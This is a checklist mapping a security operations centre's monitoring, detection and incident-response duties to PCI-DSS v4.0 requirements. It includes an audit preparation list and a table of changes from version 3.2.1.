PCI-DSS v4.0 — SOC Requirements Checklist¶
Map SOC operational requirements to PCI-DSS v4.0 controls.
Use this document for audit preparation and gap identification.
1. Overview¶
PCI-DSS v4.0 (effective March 2024) defines security requirements for organizations handling payment card data. SOC teams play a critical role in meeting monitoring, detection, and response requirements.
SOC-Relevant Requirements¶
pie title PCI-DSS Requirements Covered by SOC
"SOC Directly Responsible" : 4
"SOC Contributes" : 5
"Not SOC Scope" : 3SOC operations directly address Requirements 10, 11, 12.10 and contribute to Requirements 1, 2, 5, 6, 7.
2. Requirement 10 — Log and Monitor All Access¶
SOC Role: Primary owner of log management and monitoring.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 10.1 | Processes and mechanisms for logging and monitoring | ✅ | Log Source Matrix |
| 10.2 | Audit logs capture required events | ✅ | Log Source Onboarding |
| 10.3 | Audit logs are protected from destruction | 🟡 | Log Clearing PB |
| 10.4 | Audit logs are reviewed for anomalies | ✅ | Alert Tuning, Detection Rules |
| 10.5 | Audit log history is retained | 🟡 | Data Handling Protocol |
| 10.6 | Time-synchronization technology | 🟡 | Log Source Matrix |
| 10.7 | Failures of critical security controls detected & reported | ✅ | SOC Checklists, Shift Handoff |
3. Requirement 11 — Test Security Regularly¶
SOC Role: Detection validation and vulnerability scanning.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 11.1 | Processes for regular security testing | ✅ | Simulation Guide |
| 11.2 | Wireless access points managed | ⬜ | Not SOC scope (network team) |
| 11.3 | Vulnerabilities identified and addressed | ✅ | Vulnerability Management |
| 11.4 | External/internal penetration testing | 🟡 | Purple Team Exercise |
| 11.5 | Network intrusions/changes detected and responded to | ✅ | Network Security Monitoring, IDS/IPS Sigma Rules |
| 11.6 | Unauthorized changes to payment pages detected | 🟡 | Web Attack PB |
4. Requirement 12.10 — Incident Response¶
SOC Role: Primary owner of incident response.
| Sub-Req | Control | SOC Coverage | SOC Document |
|---|---|---|---|
| 12.10.1 | Incident response plan exists | ✅ | IR Framework |
| 12.10.2 | Plan is reviewed and tested annually | ✅ | Purple Team Exercise, Phishing Simulation |
| 12.10.3 | Specific personnel available 24/7 | ✅ | SOC Team Structure, Shift Handoff |
| 12.10.4 | Personnel are properly trained | ✅ | Training Checklist, Analyst Onboarding |
| 12.10.4.1 | Frequency of IR training defined | ✅ | Training Checklist |
| 12.10.5 | Alerts from security monitoring trigger response | ✅ | Escalation Matrix, 50 Playbooks |
| 12.10.6 | IR plan is modified based on lessons learned | ✅ | Lessons Learned Template |
| 12.10.7 | IR procedures in place for critical alerts | ✅ | Severity Matrix; P1 playbooks |
5. SOC Contributions to Other Requirements¶
| Req | Title | SOC Contribution | Document |
|---|---|---|---|
| 1 | Network Security Controls | Monitor firewall & IDS alerts | Network Security Monitoring |
| 2 | Secure Configurations | Detect misconfigurations via monitoring | Cloud Security Monitoring |
| 5 | Anti-Malware | Monitor endpoint protection alerts | Malware PB, Ransomware PB |
| 6 | Secure Systems & Software | Monitor for exploitation attempts | Exploit PB, Zero-Day PB |
| 7 | Restrict Access | Monitor access control violations | Access Control, Privilege Escalation PB |
6. Audit Preparation Checklist¶
Use this checklist before a PCI-DSS audit:
- Log retention — Verify 12 months of logs available (3 months immediately accessible)
- Monitoring coverage — Confirm all CDE (Cardholder Data Environment) systems in Log Source Matrix
- Alert response — Document SLA compliance for P1/P2 alerts
- IR testing — Provide evidence of annual Purple Team exercise or tabletop
- Training records — Show analyst training completion dates
- Change detection — Demonstrate file integrity monitoring on payment pages
- Vulnerability scans — Show quarterly internal/external scan results
- Incident log — Provide ticketing system export with resolution times
7. Key Differences: PCI-DSS v3.2.1 → v4.0¶
| Area | v3.2.1 | v4.0 (New) | SOC Impact |
|---|---|---|---|
| Log review | Daily manual review | Automated monitoring + targeted risk analysis | Increase SIEM automation |
| Detection | IDS/IPS required | + Network behavioral analysis | Add network anomaly detection |
| IR testing | Annual test | Annual test + scenario-specific exercises | Add Purple Team exercises |
| Authentication | MFA for remote access | MFA for all CDE access | Monitor for MFA bypass |
| Customized approach | N/A | Organizations can customize controls | Document alternative approaches |